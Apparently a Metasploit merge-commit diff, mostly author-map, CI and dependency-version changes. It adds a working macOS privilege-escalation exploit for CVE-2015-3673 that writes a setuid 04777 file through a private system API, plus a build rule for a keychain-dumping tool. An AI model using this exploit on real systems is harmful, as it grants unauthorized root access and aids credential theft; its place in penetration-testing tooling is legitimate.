author
Pedro Ribeiro
committed
Merge pull request #19 from rapid7/master
Abba
2 parents 70a2247 + 26c8380 commit 9746753

892 files changed

+119799
-87904
lines changed


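--- a/.mailmap
+++ b/.mailmap
@@ -1,4 +1,5 @@
 bcook-r7 <bcook-r7@github> Brent Cook <[email protected]>
+bcook-r7 <bcook-r7@github> <[email protected]>
 bturner-r7 <bturner-r7@github> Brandon Turner <[email protected]>
 ccatalan-r7 <ccatalan-r7@github> Christian Catalan <[email protected]>
 cdoughty-r7 <cdoughty-r7@github> Chris Doughty <[email protected]>
@@ -11,9 +12,8 @@ farias-r7 <farias-r7@github> Fernando Arias <[email protected]>
 hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
 hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
 jhart-r7 <jhart-r7@github> Jon Hart <[email protected]>
-jlee-r7 <jlee-r7@github> James Lee <[email protected]>
-jlee-r7 <jlee-r7@github> James Lee <[email protected]> # aka egypt
-jlee-r7 <jlee-r7@github> egypt <[email protected]> # aka egypt
+jlee-r7 <jlee-r7@github> <[email protected]>
+jlee-r7 <jlee-r7@github> <[email protected]> # aka egypt
 jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
 jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
 kgray-r7 <kgray-r7@github> Kyle Gray <[email protected]>
@@ -37,9 +37,8 @@ todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
 todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
 trosen-r7 <trosen-r7@github> Trevor Rosen <[email protected]>
 trosen-r7 <trosen-r7@github> Trevor Rosen <[email protected]>
-wchen-r7 <wchen-r7@github> Wei Chen <[email protected]>
-wchen-r7 <wchen-r7@github> sinn3r <[email protected]> # aka sinn3r
-wchen-r7 <wchen-r7@github> sinn3r <[email protected]>
+wchen-r7 <wchen-r7@github> <[email protected]> # aka sinn3r
+wchen-r7 <wchen-r7@github> <[email protected]>
 wvu-r7 <wvu-r7@github> William Vu <[email protected]>
 wvu-r7 <wvu-r7@github> William Vu <[email protected]>
 wvu-r7 <wvu-r7@github> William Vu <[email protected]>
@@ -73,18 +72,18 @@ efraintorres <efraintorres@github> efraintorres <[email protected]>
 efraintorres <efraintorres@github> et <>
 fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
 FireFart <FireFart@github> Christian Mehlmauer <[email protected]>
+FireFart <FireFart@github> <[email protected]>
 h0ng10 <h0ng10@github> h0ng10 <[email protected]>
 h0ng10 <h0ng10@github> Hans-Martin Münch <[email protected]>
-jcran <jcran@github> Jonathan Cran <[email protected]>
-jcran <jcran@github> Jonathan Cran <[email protected]>
-jduck <jduck@github> Joshua Drake <[email protected]>
+jcran <jcran@github> <[email protected]>
+jcran <jcran@github> <[email protected]>
+jcran <jcran@github> <[email protected]>
+jcran <jcran@github> <[email protected]>
+jduck <jduck@github> <[email protected]>
+jduck <jduck@github> <[email protected]>
 jgor <jgor@github> jgor <[email protected]>
-joevennix <joevennix@github> joe <[email protected]>
-joevennix <joevennix@github> Joe Vennix <[email protected]>
-joevennix <joevennix@github> Joe Vennix <[email protected]>
-joevennix <joevennix@github> joev <[email protected]>
-joevennix <joevennix@github> jvennix-r7 <[email protected]>
-joevennix <joevennix@github> jvennix-r7 <[email protected]>
+joevennix <joevennix@github> <[email protected]>
+joevennix <joevennix@github> <[email protected]>
 kernelsmith <kernelsmith@github> Joshua Smith <[email protected]>
 kernelsmith <kernelsmith@github> Joshua Smith <[email protected]>
 kernelsmith <kernelsmith@github> kernelsmith <kernelsmith@kernelsmith>
@@ -94,18 +93,17 @@ m-1-k-3 <m-1-k-3@github> m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github> m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github> m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github> Michael Messner <[email protected]>
-Meatballs1 <Meatballs1@github> Ben Campbell <[email protected]>
-Meatballs1 <Meatballs1@github> Meatballs <[email protected]>
-Meatballs1 <Meatballs1@github> Meatballs1 <[email protected]>
+Meatballs1 <Meatballs1@github> <[email protected]>
+Meatballs1 <Meatballs1@github> <[email protected]>
 mubix <mubix@github> Rob Fuller <[email protected]>
 nevdull77 <nevdull77@github> Patrik Karlsson <[email protected]>
 nmonkee <nmonkee@github> nmonkee <[email protected]>
 nullbind <nullbind@github> nullbind <[email protected]>
 nullbind <nullbind@github> Scott Sutherland <[email protected]>
 ohdae <ohdae@github> ohdae <[email protected]>
-oj <oj@github> OJ <[email protected]>
-oj <oj@github> OJ Reeves <[email protected]>
+oj <oj@github> <[email protected]>
 r3dy <r3dy@github> Royce Davis <[email protected]>
+r3dy <r3dy@github> Royce Davis <[email protected]>
 r3dy <r3dy@github> Royce Davis <[email protected]>
 Rick Flores <[email protected]> Rick Flores (nanotechz9l) <[email protected]>
 rsmudge <rsmudge@github> Raphael Mudge <[email protected]> # Aka `butane
@@ -116,8 +114,7 @@ skape <skape@???> Matt Miller <[email protected]>
 spoonm <spoonm@github> Spoon M <[email protected]>
 swtornio <swtornio@github> Steve Tornio <[email protected]>
 Tasos Laskos <[email protected]> Tasos Laskos <[email protected]>
-timwr <timwr@github> Tim <[email protected]>
-timwr <timwr@github> Tim Wright <[email protected]>
+timwr <timwr@github> <[email protected]>
 TomSellers <TomSellers@github> Tom Sellers <[email protected]>
 TrustedSec <[email protected]> trustedsec <[email protected]>
 zeroSteiner <zeroSteiner@github> Spencer McIntyre <[email protected]>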

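--- a/.travis.yml
+++ b/.travis.yml
@@ -41,3 +41,6 @@ branches:
 
 addons:
 postgresql: '9.3'
+apt:
+packages:
+- libpcap-dev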

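--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,33 +1,34 @@
 PATH
 remote: .
 specs:
-metasploit-framework (4.11.3)
+metasploit-framework (4.11.4)
 actionpack (>= 4.0.9, < 4.1.0)
 activesupport (>= 4.0.9, < 4.1.0)
 bcrypt
 jsobfu (~> 0.2.0)
 json
+metasm (~> 1.0.2)
 metasploit-concern (= 1.0.0)
 metasploit-model (= 1.0.0)
-metasploit-payloads (= 1.0.7)
+metasploit-payloads (= 1.0.15)
 msgpack
 nokogiri
-packetfu (= 1.1.9)
+packetfu (= 1.1.11)
 railties
 rb-readline-r7
 recog (= 2.0.6)
 robots
 rubyzip (~> 1.1)
 sqlite3
 tzinfo
-metasploit-framework-db (4.11.3)
+metasploit-framework-db (4.11.4)
 activerecord (>= 4.0.9, < 4.1.0)
-metasploit-credential (= 1.0.0)
-metasploit-framework (= 4.11.3)
+metasploit-credential (= 1.0.1)
+metasploit-framework (= 4.11.4)
 metasploit_data_models (= 1.2.5)
 pg (>= 0.11)
-metasploit-framework-pcap (4.11.3)
-metasploit-framework (= 4.11.3)
+metasploit-framework-pcap (4.11.4)
+metasploit-framework (= 4.11.4)
 network_interface (~> 0.0.1)
 pcaprub
 
@@ -104,14 +105,15 @@ GEM
 i18n (0.7.0)
 jsobfu (0.2.1)
 rkelly-remix (= 0.0.6)
-json (1.8.2)
+json (1.8.3)
 mail (2.6.3)
 mime-types (>= 1.16, < 3)
+metasm (1.0.2)
 metasploit-concern (1.0.0)
 activerecord (>= 4.0.9, < 4.1.0)
 activesupport (>= 4.0.9, < 4.1.0)
 railties (>= 4.0.9, < 4.1.0)
-metasploit-credential (1.0.0)
+metasploit-credential (1.0.1)
 metasploit-concern (~> 1.0)
 metasploit-model (~> 1.0)
 metasploit_data_models (~> 1.0)
@@ -123,7 +125,7 @@ GEM
 activemodel (>= 4.0.9, < 4.1.0)
 activesupport (>= 4.0.9, < 4.1.0)
 railties (>= 4.0.9, < 4.1.0)
-metasploit-payloads (1.0.7)
+metasploit-payloads (1.0.15)
 metasploit_data_models (1.2.5)
 activerecord (>= 4.0.9, < 4.1.0)
 activesupport (>= 4.0.9, < 4.1.0)
@@ -135,18 +137,20 @@ GEM
 railties (>= 4.0.9, < 4.1.0)
 recog (~> 2.0)
 method_source (0.8.2)
-mime-types (2.4.3)
+mime-types (2.6.1)
 mini_portile (0.6.2)
 minitest (4.7.5)
-msgpack (0.6.0)
-multi_json (1.11.1)
+msgpack (0.6.2)
+multi_json (1.11.2)
 multi_test (0.1.2)
 network_interface (0.0.1)
 nokogiri (1.6.6.2)
 mini_portile (~> 0.6.0)
-packetfu (1.1.9)
+packetfu (1.1.11)
+network_interface (~> 0.0)
+pcaprub (~> 0.12)
 pcaprub (0.12.0)
-pg (0.18.2)
+pg (0.18.3)
 pg_array_parser (0.0.9)
 postgres_ext (2.4.1)
 activerecord (>= 4.0.0)
@@ -198,7 +202,7 @@ GEM
 rspec-core (~> 2.99.0)
 rspec-expectations (~> 2.99.0)
 rspec-mocks (~> 2.99.0)
-rubyntlm (0.5.0)
+rubyntlm (0.5.2)
 rubyzip (1.1.7)
 shoulda-matchers (2.8.0)
 activesupport (>= 3.0.0)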

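--- /dev/null
+++ b/data/exploits/CVE-2015-3673/exploit.m
@@ -0,0 +1,33 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+if (p != NULL)
+{
+id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+data,
+outpath,
+@{ NSFilePosixPermissions : @04777 });
+}
+
+exit(1);
+}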
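Review bot: `test` calls `exit(1)` unconditionally at its last statement, so the process that loaded this bundle is terminated whether or not the `dlopen` succeeded or `createFileWithContents:path:attributes:` was reached, and nothing in the file records that the only observable outcome is the presence (or absence) of the file at `PAYLOAD_OUT`. The file's only comment is the build line; a header comment should name CVE-2015-3673, state that `test` runs as a load-time constructor of the `.daplug` bundle, that the input and output paths are read from the `PAYLOAD_IN` and `PAYLOAD_OUT` environment variables (with `dataWithContentsOfFile:` yielding nil when `PAYLOAD_IN` is unset), and that the unconditional `exit(1)` is intentional. The permission literal also deserves a why-comment, e.g. `// 04777: setuid + world-writable; this mode is also the on-disk artifact a defender should alert on`. `FWK_BASE` is defined but never referenced and can be dropped or commented as reserved.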
Lines changed: 2 additions & 0 deletions
@@ -0,0 +1,2 @@
1+
all:
2+
gcc dump.m -framework CoreFoundation -framework Security -framework Cocoa -o dump

data/exploits/osx/dump_keychain/dump

